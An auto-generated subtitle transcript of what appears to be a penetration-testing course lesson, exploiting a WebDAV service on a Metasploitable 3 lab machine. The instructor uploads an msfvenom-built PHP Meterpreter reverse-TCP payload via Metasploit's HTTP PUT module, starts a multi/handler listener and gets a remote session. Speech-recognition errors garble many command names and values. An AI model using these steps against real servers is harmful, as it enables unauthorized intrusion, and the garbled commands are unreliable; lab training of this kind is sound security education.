1 00:00:00,300 --> 00:00:04,380 So list HTP related services on Métis, Voidable three. 2 00:00:05,940 --> 00:00:10,870 And the service, which runs on 85, 85, has important information. 3 00:00:11,670 --> 00:00:12,220 That's right. 4 00:00:12,240 --> 00:00:13,570 A Web Dabb service. 5 00:00:14,370 --> 00:00:21,150 So in that enumeration stage, you have enumerated that you can upload a file to the server. 6 00:00:21,900 --> 00:00:24,530 Now it's time to take advantage of this. 7 00:00:25,320 --> 00:00:27,820 Now, remembering what we did before. 8 00:00:28,440 --> 00:00:31,440 I'm going to start from the beginning so that you get in the habit of this. 9 00:00:31,920 --> 00:00:38,550 First, choose the auxiliary module that provides us with an option to upload a file on the server. 10 00:00:39,640 --> 00:00:46,270 Use auxiliary scanner, htp, htp put. 11 00:00:47,220 --> 00:00:48,650 Show me the options. 12 00:00:50,150 --> 00:00:58,850 All right, so set our host to ten point ten, 210, set path to forward slash uploads. 13 00:01:00,000 --> 00:01:05,220 Next, you must set file data as your variable. 14 00:01:06,500 --> 00:01:13,940 Now, what are we going to do here is I'm going to create an interpreter, reversed HCP, though, and 15 00:01:14,150 --> 00:01:16,700 upload that page with this module. 16 00:01:18,100 --> 00:01:25,090 So open a new tab, MSF Venom is a standalone payload generator for Métis Boyte. 17 00:01:26,050 --> 00:01:27,820 We're going to discuss that later. 18 00:01:28,790 --> 00:01:37,040 But right now, it's going to help us create the suitable payload, so let's type MSF Venom P. 19 00:01:38,030 --> 00:01:39,380 And the payload name. 20 00:01:40,340 --> 00:01:42,710 BHP interpretor. 21 00:01:44,360 --> 00:01:45,670 Reverse TCP. 22 00:01:48,140 --> 00:01:48,560 Host. 23 00:01:49,500 --> 00:01:57,690 Is 10 to 10 to 11 and port is 85, 85. 24 00:01:59,040 --> 00:02:04,050 Dash F, and that format's the pay, though raw. 25 00:02:05,400 --> 00:02:07,680 And show the output file name. 26 00:02:08,630 --> 00:02:10,100 Page dot, BHP. 27 00:02:12,380 --> 00:02:16,430 OK, so we've created the file that contains our payload. 28 00:02:17,270 --> 00:02:19,000 Let's go back to the mSv console. 29 00:02:21,400 --> 00:02:24,490 Said the file name to Page Dot BHP. 30 00:02:26,710 --> 00:02:30,910 And set final data to the file you've just created. 31 00:02:37,770 --> 00:02:44,100 So for one last look at some of our options, controls which show options again. 32 00:02:45,510 --> 00:02:48,330 And there's nothing to change, so let's run the module. 33 00:02:51,360 --> 00:02:53,150 Don't worry about that, you can ignore this. 34 00:02:54,140 --> 00:03:02,500 So open your browser and go to ten, ten to 10, colan, eight, five, eight, five slash uploads. 35 00:03:03,650 --> 00:03:07,190 And here is the page dot file. 36 00:03:08,070 --> 00:03:11,760 And if you click this page, yeah, goes right back to your column. 37 00:03:12,760 --> 00:03:19,990 All right, so that's all well and good, however, now you need to prepare a listener for this connection 38 00:03:19,990 --> 00:03:20,550 on Colly. 39 00:03:21,730 --> 00:03:24,130 So let's go back to the MSF council. 40 00:03:26,570 --> 00:03:29,090 Push M is the name of this module. 41 00:03:30,500 --> 00:03:33,080 And let's use the multi handler. 42 00:03:35,960 --> 00:03:36,730 That payload. 43 00:03:38,650 --> 00:03:41,350 To be interpretor. 44 00:03:42,800 --> 00:03:49,490 Reverse DCP, and that's a payload that you used previously and MSL venom. 45 00:03:50,500 --> 00:03:52,990 Set almost to your colleagues i.p. 46 00:03:54,710 --> 00:03:57,740 That airport to eight five eight five. 47 00:03:59,830 --> 00:04:00,850 Last check. 48 00:04:02,850 --> 00:04:04,690 Exploit Dash J. 49 00:04:05,820 --> 00:04:15,300 So now a listener will wait for incoming connections in the background, so let's go to the browser 50 00:04:15,300 --> 00:04:15,870 and. 51 00:04:17,340 --> 00:04:19,260 Click the page that BHP. 52 00:04:20,930 --> 00:04:21,510 Great. 53 00:04:21,740 --> 00:04:24,050 So you got the interpreter, session nine. 54 00:04:25,240 --> 00:04:26,860 So let's list the session. 55 00:04:29,350 --> 00:04:37,030 Now let's interact with session nine, my typing sessions, Dashi nine. 56 00:04:38,760 --> 00:04:40,740 And now you're interacting with Section nine. 57 00:04:41,670 --> 00:04:47,100 So let's quickly look at who am I get Eweida. 58 00:04:48,240 --> 00:04:50,820 And where am I so sinful? 59 00:04:53,000 --> 00:04:55,580 And great, so you have another session on the machine. 60 00:04:56,710 --> 00:05:00,220 And yes, you can go on to another service.